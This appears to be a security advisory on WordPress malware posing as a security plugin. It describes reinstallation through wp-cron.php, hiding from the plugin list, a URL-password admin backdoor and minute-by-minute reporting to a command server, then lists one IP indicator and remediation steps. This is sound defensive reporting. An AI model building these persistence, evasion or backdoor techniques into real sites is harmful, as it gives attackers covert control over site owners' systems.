Analysis Summary

A newly identified and highly sophisticated malware variant is targeting WordPress websites by disguising itself as a legitimate security plugin. It appears under seemingly benign filenames such as WP-antymalwary-bot.php or wp-performance-booster.php, effectively misleading website administrators. Behind this legitimate facade, the malware is equipped with capabilities for remote code execution, unauthorized administrator access, and malicious JavaScript injection functions that allow attackers to display unwanted advertisements and fully control compromised websites.

One of the most alarming aspects of this malware is its persistence. It manipulates the WordPress wp-cron.php file to automatically reinstall itself if removed, making cleanup efforts by administrators largely ineffective. The malware also communicates regularly with a Command and Control (C&C) server based in Cyprus, sending infected site URLs and timestamps every minute. This enables attackers to maintain an up-to-date inventory of compromised websites and potentially orchestrate coordinated attacks at scale.

Discovered by Researchers during a routine cleanup on January 22, 2025, the malware was noted for its technical sophistication and the deliberate effort to mimic a legitimate plugin structure. Researcher quickly developed detection signatures, pushing them to premium customers by January 24, while free users are scheduled to receive them by May 23, 2025. The malware employs advanced evasion techniques, such as concealing itself from the WordPress plugin dashboard by unsetting its presence using the add_filter('all_plugins', ...) function.

In addition to evasion, the malware includes an emergency login mechanism that grants admin privileges via a predefined password passed through a URL parameter. This function automatically identifies the first administrator account and sets an authentication cookie, thereby granting full access to the admin dashboard without triggering any typical login alerts. This combination of persistence, stealth, real-time communication, and unauthorized access showcases a dangerous evolution in WordPress-targeted threats, presenting a serious risk to website integrity and administrator trust.

Impact

• File Manipulation
• Code Execution
• Unauthorize Access

Indicators of Compromise

IP

• 45.61.136.85

Affected Vendors

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Immediately scan your site using up-to-date malware detection tools like Wordfence (with premium signatures if possible) to identify and quarantine malicious files such as WP-antymalwary-bot.php and wp-performance-booster.php.
• Manually inspect your file system, especially the wp-content/plugins/, wp-cron.php, and any recently modified core files for unauthorized changes or unfamiliar code.
• Delete all traces of the malicious plugin, including any suspicious files or injected JavaScript code. Ensure that the wp-cron.php file is restored to its original state.
• Disable cron reinfection mechanisms by locking down write permissions on core WordPress files (wp-cron.php, wp-config.php, etc.) after clean-up to prevent automatic reinjection.
• Update all plugins, themes, and WordPress core to the latest versions to patch known vulnerabilities that may have been exploited for initial access.
• Change all administrator passwords immediately, especially if the emergency login feature was exploited. Audit all user accounts and remove any unknown or suspicious admin users.
• Implement a Web Application Firewall (WAF) to block malicious traffic and prevent communication with the malware’s C&C server, especially outbound connections to known IPs in Cyprus.
• Enable security logging and monitoring to detect future anomalies in login behavior, file changes, and plugin activity.
• Regularly back up your site and store backups securely offline or in a trusted cloud storage solution to aid in recovery from future compromises.
• Consider using security plugins that support file integrity monitoring, two-factor authentication, and real-time alerts for suspicious behavior.